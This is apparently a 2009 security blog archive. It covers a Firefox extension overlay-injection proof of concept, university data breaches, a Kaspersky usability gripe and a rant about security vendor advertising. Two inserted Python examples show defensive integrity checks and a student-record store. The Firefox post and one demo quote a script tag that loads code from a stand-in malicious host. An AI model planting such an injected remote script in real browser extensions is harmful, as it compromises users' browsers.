Friday, May 22, 2009
- Date: May 26th, 2009
- Start Time: 11:00am EDT
- General ISACA URL: http://www.isaca.org/Content/NavigationMenu/Members_and_Leaders1/Events3/Webcasts/ISACA_e-symposia_and_Webcasts.htm
- My Topic: "Solving Problems That Don't Exist: Building Better Application Security Practices"
- My Start Time: 1:20pm EDT
In today's enterprise, Web Application Security has come front and center for security managers as well as the business. However, many well-funded, well-backed programs fail, because they miss the fundamental rule of problem solving -- understand the problem. The secret to success is simple -- understand your business context and build a program around that. How can you develop an actionable, business risk-driven program? Understanding your role is key, followed by successful identification of a cornerstone upon which to base the program. This presentation will teach you how to evaluate data value, application visibility and business exposure one step at a time and assign real, measurable risk. Participants will be given a strong foundation to succeed, so they don't end up solving problems the business doesn't have. Hope to see you on there! I'll be posting slides from the talk on Wednesday, to the usual SlideShare.net place! I'd love to hear your questions and comments after the talk.
Thursday, May 21, 2009
"I agree, this isn't really novel.
It's an interesting POC, but if I have local access to your file system, there are tons of easy ways to own you...
We just don't have systems that were designed to stand up to local access, case closed. An attacker could just as easily modify one of Firefox's own executables or libraries, your proxy settings, etc..."
In the final analysis, at least for me, it doesn't really matter that Firefox chooses to use XUL, which allows for an arbitrary script tag in the extension manifest file... although that is a seriously neat trick. What really matters is that the attack surface of Firefox is laid bare through the plug-in/extension architecture, which in my humble opinion is fundamentally flawed from a security perspective. It doesn't matter if we sign/encrypt/check-recheck that manifest file for a maliciously injected script src="http://malicious.tld/malicious.js" ... the browser is hosed anyway, long before that.
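Since the post's point is that an on-disk edit to an installed extension goes unverified, the practical defender-side check is to baseline the extension directory and scan overlay files for script tags that load from a remote http(s) host. The following is an added example, not code from the original post or from Mozilla; it assumes the stock layout of a chrome.manifest plus chrome/content/*.xul overlays, and that legitimate overlays only load scripts via chrome:// URLs. The sample extension tree and the tampered line it detects are constructed inline.

```python
"""File-integrity baseline plus remote-script scan for a Firefox extension
directory. Added example; assumes chrome/content/*.xul overlays and that
legitimate overlays load scripts only from chrome:// URLs."""
import hashlib
import os
import re
import tempfile

# A <script ... src="http://..."> (or https://) inside an overlay is the
# injection the quoted post describes; chrome:// sources are left alone.
REMOTE_SCRIPT_RE = re.compile(
    r'<script\b[^>]*\bsrc\s*=\s*["\'](https?://[^"\']+)["\']', re.IGNORECASE)


def _walk(root):
    """Yield (relative_path, absolute_path) for every file under root."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            yield os.path.relpath(full, root).replace(os.sep, "/"), full


def hash_tree(root):
    """Return {relative_path: sha256 hex digest} for the extension tree."""
    digests = {}
    for rel, full in _walk(root):
        with open(full, "rb") as fh:
            digests[rel] = hashlib.sha256(fh.read()).hexdigest()
    return digests


def diff_baseline(baseline, current):
    """Compare two hash_tree() snapshots: which paths were added, removed, changed."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in baseline
                           if p in current and baseline[p] != current[p]),
    }


def find_remote_scripts(root):
    """List (relative_path, url) for overlay files that pull script over http(s)."""
    hits = []
    for rel, full in _walk(root):
        if not rel.endswith((".xul", ".xhtml")):
            continue
        with open(full, "r", encoding="utf-8", errors="replace") as fh:
            for url in REMOTE_SCRIPT_RE.findall(fh.read()):
                hits.append((rel, url))
    return hits


# Constructed, minimal clean overlay: script comes from the extension's own chrome:// content.
CLEAN_OVERLAY = """<?xml version="1.0"?>
<overlay id="sample-overlay" xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
  <script type="application/x-javascript" src="chrome://sample/content/sample.js"/>
</overlay>
"""
CLEAN_MANIFEST = ("content sample chrome/content/\n"
                  "overlay chrome://browser/content/browser.xul chrome://sample/content/overlay.xul\n")


def demo():
    """Baseline a constructed extension tree, then show both checks firing after an edit."""
    with tempfile.TemporaryDirectory() as root:
        content = os.path.join(root, "chrome", "content")
        os.makedirs(content)
        overlay = os.path.join(content, "overlay.xul")
        with open(overlay, "w", encoding="utf-8") as fh:
            fh.write(CLEAN_OVERLAY)
        with open(os.path.join(root, "chrome.manifest"), "w", encoding="utf-8") as fh:
            fh.write(CLEAN_MANIFEST)

        baseline = hash_tree(root)          # taken right after install
        clean_hits = find_remote_scripts(root)

        # Constructed tampering, using the URL quoted in the post: the overlay
        # now references a remote script, exactly what the baseline should catch.
        with open(overlay, "a", encoding="utf-8") as fh:
            fh.write('<script src="http://malicious.tld/malicious.js"/>\n')

        changes = diff_baseline(baseline, hash_tree(root))
        remote = find_remote_scripts(root)
    return {"clean_hits": clean_hits, "changes": changes, "remote_scripts": remote}


if __name__ == "__main__":
    print(demo())
```

The hash baseline is the part that generalizes: it catches any edit to any extension file, not only the overlay trick, which matches the commenter's point that local write access leaves many other files to tamper with. The regex scan is a cheap triage signal on top of that, not a substitute for it.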
Wednesday, May 20, 2009
"You can infect one of the installed add-ons, because Firefox isn’t able to verify if an add-on is compromised or not. To do that you only need to edit the file that defines the overlay." --D. Silva
Tuesday, May 19, 2009
Monday, May 18, 2009
Thursday, May 14, 2009
- Social Engineering - Lesson #1, make sure you only pay your waiter! Although this guy was clearly good at playing the disguise, the restaurant patrons are just as much at fault for being clueless and not paying attention! Interesting read...
- VISA's Latest Anti-Fraud - The Europeans have figured out credit card fraud pretty well, and are way ahead of us Americans unfortunately - and here's another example. VISA is now introducing a card that goes beyond chip-and-pin with a built-in computer and keypad on the card itself to combat card-not-present fraud. I hope we get them in the 'States before I turn 50... hope they fit well into the wallet?
- Apple's "Big Fix" - Apple released fixes for, get this, 68 security issues. I guess all those ads about Macs "not getting viruses, crashing, ..." are just as full of crap as the rest of the Mac vs. PC war. I think it's time to add up the public vulnerability data for Microsoft and Apple for the year again...
- Minnesota's Capitol "Seriously Vulnerable" - Here's a shocker... Minnesota's Legislative Auditor (who?) released a report that basically said that Capitol security was crap. I'm partial to the security doors that were installed... I love random acts of useless security, don't you?
- Adobe's Security Woes - ...and last but certainly not least, in case you've been living in a cave with no Internet, Adobe fixed yet another round of PDF problems recently. Link to the entire slew of advisories included above... can't wait for the next round.
"...designed to educate system administrators and developers on some common dangers and mis-configurations facing Linux, Apache, MySQL, PHP (LAMP) applications." The great news here is that this is all 100% documented with step-by-step instructions, including the tools you'll need and all the coaching you can stand, all in one handy package. Justin Keane and the folks over at www.LAMPSecurity.org are doing a phenomenal job of bringing these special images to you - so by all means go and use them to your advantage! The only thing you'll need is VMware Player, some time, and your creativity!
Wednesday, May 13, 2009
- UC Berkeley Breach Affects 160,000 (Berkeley link here)
- Data About Students Dispersed in Breach
- Financial Aid Data at KCC May Be at Risk
- Collect and store only the information absolutely needed and no more
- Encrypt personal and private information from students and faculty
- Centralize sensitive data stores and do not distribute this information throughout the school
- Destroy (digitally shred) digital information after a defined retention period
- Carefully limit access to sensitive information via roles and permissions
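Four of the five controls above (collect only what is needed, keep one central store, purge after the retention period, restrict by role) can be enforced in code rather than left to policy documents. The block below is an added example and is not from the post or from any of the schools mentioned; the field names, the two roles, the three-year retention period and the sample records are all assumptions chosen to illustrate the list. Encryption at rest, the remaining control, is deliberately left out here since it needs a crypto library rather than the standard library.

```python
"""Student-record store enforcing data minimization, role-based read access,
a single central store and retention-based purge. Added example; field names,
roles, retention period and sample records are assumptions."""
from datetime import datetime, timedelta, timezone

# Assumption: the only fields the institution has declared a need to hold.
ALLOWED_FIELDS = frozenset({"student_id", "name", "ssn", "financial_aid_status"})
# Assumption: fields whose reads are worth logging for later investigation.
SENSITIVE_FIELDS = frozenset({"ssn", "financial_aid_status"})
# Assumption: which role may see which fields (least privilege).
ROLE_VIEW = {
    "registrar": frozenset({"student_id", "name"}),
    "financial_aid": ALLOWED_FIELDS,
}
RETENTION = timedelta(days=3 * 365)  # assumed retention period


class StudentStore:
    """One central store; every sensitive read and every purge lands in audit_log."""

    def __init__(self, clock=None):
        self._records = {}
        self._clock = clock or (lambda: datetime.now(timezone.utc))
        self.audit_log = []

    def add(self, record):
        # Data minimization: refuse anything outside the declared field set.
        undeclared = set(record) - ALLOWED_FIELDS
        if undeclared:
            raise ValueError("refusing undeclared fields: %s" % sorted(undeclared))
        self._records[record["student_id"]] = {
            "data": dict(record), "stored_at": self._clock()}

    def read(self, role, student_id):
        # Role-based filtering: the caller only ever receives the fields its role allows.
        visible = ROLE_VIEW.get(role)
        if visible is None:
            raise PermissionError("unknown role %r" % role)
        data = self._records[student_id]["data"]
        view = {k: v for k, v in data.items() if k in visible}
        touched = sorted(set(view) & SENSITIVE_FIELDS)
        if touched:
            self.audit_log.append((self._clock(), role, student_id, touched))
        return view

    def purge_expired(self):
        # Retention: drop records stored longer than RETENTION ago.
        cutoff = self._clock() - RETENTION
        expired = sorted(sid for sid, rec in self._records.items()
                         if rec["stored_at"] <= cutoff)
        for sid in expired:
            self._records[sid]["data"].clear()  # blank the dict before dropping it
            del self._records[sid]
            self.audit_log.append((self._clock(), "retention", sid, ["purged"]))
        return expired

    def __len__(self):
        return len(self._records)


def demo():
    """Walk the controls with constructed records and a controllable clock."""
    t0 = datetime(2009, 5, 13, tzinfo=timezone.utc)
    now = [t0]
    store = StudentStore(clock=lambda: now[0])
    store.add({"student_id": "S1", "name": "A. Student",
               "ssn": "000-00-0000", "financial_aid_status": "awarded"})
    try:  # a field nobody declared a need for is rejected outright
        store.add({"student_id": "S2", "name": "B. Student", "home_address": "constructed"})
        rejected = False
    except ValueError:
        rejected = True
    registrar_view = store.read("registrar", "S1")   # no SSN, no aid status
    aid_view = store.read("financial_aid", "S1")     # full record, read is logged
    now[0] = t0 + RETENTION + timedelta(days=1)      # advance past the retention period
    store.add({"student_id": "S3", "name": "C. Student"})
    purged = store.purge_expired()                   # S1 expired, S3 is fresh
    return {"rejected": rejected, "registrar_view": registrar_view,
            "aid_view": aid_view, "purged": purged,
            "remaining": len(store), "audit_entries": len(store.audit_log)}


if __name__ == "__main__":
    print(demo())
```

The audit log is the piece most often missing from real deployments: a breach notice like the ones linked above is far easier to scope when every read of an SSN is attributable to a role and a time.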
Monday, May 11, 2009
With all the focus on "usable security" lately I've been going insane trying to figure out how to get products to actually be useful for the common user. I was relatively sure that Kaspersky had things figured out, at least reasonably well, until this happened today. I can't explain it - I don't know what this "unknown application" is (my guess is that installing VMware 6.5 somehow triggered this) but I do know I really wish there was a terminate process (or at least a DENY button). What am I supposed to click?
Is anyone from Kaspersky reading this? Can you tell me what the hell this is and what I should be doing about it? How do I investigate the root-cause? What if this really IS a keylogger?!
Saturday, May 9, 2009
Thursday, May 7, 2009
Tuesday, May 5, 2009
I haven’t gone on a good rant lately – but it’s high time I let it out because it’s been building like the tension in the Ferrari F1 team. I’ve been keeping a steady eye on the marketing efforts around “security stuff” as the economy has been tanking and I’d like to share with you some observations.
Perhaps in a stable economy, one where we’re not spending our great-great-great-grandchildren’s savings, these observations wouldn’t make me so nuts… but in light of corporate spending habits in such a climate I feel the need to call out these ridiculous happenings.
The crescendo of my madness was earlier today when I walked, errr…hobbled, through Chicago’s O’Hare International Airport slow enough to actually look at some of the signage and billboards. I came up the escalator in Terminal 1 to be greeted by a WatchGuard Firebox ad and immediately I stopped and took note; then I took a picture just so I can have proof of this insanity. After getting through security I was greeted overhead by a giant big-screen style video board running ads for none other than Symantec. Symantec’s ad was a little less upsetting – and unfortunately I couldn’t get a good picture of it in spite of my efforts.
The Symantec ad basically said this … “We protect more corporations, systems and users than anyone else in the world”. I then had a quick flashback to the last 3 big companies I worked at. Not surprisingly Symantec’s logo was all over each one. From dysfunctional desktop firewall/antivirus/anti-malware to a SIM, to some backup software – Symantec was everywhere. I then recalled how much we all (in IT Security) complained that the products were crap and we could barely make it do what we needed it to do, much less what the sales guys had convinced our management it would do. OK so fair enough – for better or for worse, Symantec had protected (or secured if you really stretch the meaning) each one of those enterprises.
Now let me take a minute to address WatchGuard’s “Complete Network Security In One Box” slogan in those big white letters. First off, to you and me the insertion of the word network in that slogan means that it doesn’t actually protect against anything that doesn’t attack at the network layer. The average business-person, however, does not quite see that subtle distinction. They see the WatchGuard ad, and see that they can solve the “hacker problem” by plugging this box in… and nothing else. How do I know this for such a fact? I stood there for a few minutes and asked some random people in business suits. I realize this isn’t a scientific poll – but it’s what I had to work with. Perhaps I’ll make this a little more scientific in the near future if you readers think you want to read more.
Let me get to the point of my rant here for the sake of keeping this relatively brief – I hate few things more than when a vendor sells magic pixie dust. I personally haven’t picked up a Firebox since about spring ’00 when I was working as a consultant and we replaced a few at some SMBs. Not that I personally have anything against the Firebox because I do think that any UTM Firewall is as crappy as the next, but this type of advertising makes me mad as a hatter. I realize full well that in a contracting economy vendors scrap for as much business as possible, and business is business, but please stop over-selling your products. Also, please realize that the way you advertise impacts not just your business but the entire industry … often negatively. What that WatchGuard ad says to the unsuspecting business owner is “Hey, buy this box and forget about security” – which simply isn’t true! Businesses have web applications, random portable user devices (iPods, etc), and a plethora of other threats that these UTM Firewall boxes simply don’t address. To insinuate that your product is the magic security pixie dust is irresponsible, and actually does more harm than good. …and don’t give me that “But we’re being honest and saying we only cover network security” crap… you know who you’re targeting here and know damn well that your target audience doesn’t understand the difference. And this isn’t just a rant against WatchGuard because their ad was just the latest that caught my attention… this goes for all of your marketing teams that have that stupid “Security. Solved” mentality to your ads – you know who you are.
As a call to action, I urge everyone that sees one of these irresponsible ads – take a picture, post it somewhere… call them out. If we as security professionals continue to allow this madness to seep into our industry – our already confusing talks with business leaders will be even more confusing when we have to tell them their magic red box does nothing to keep their credit card database safe… and that’s not just bad for us – it’s bad for business, period.
…and with that I’ll step off my soapbox, thanks for reading!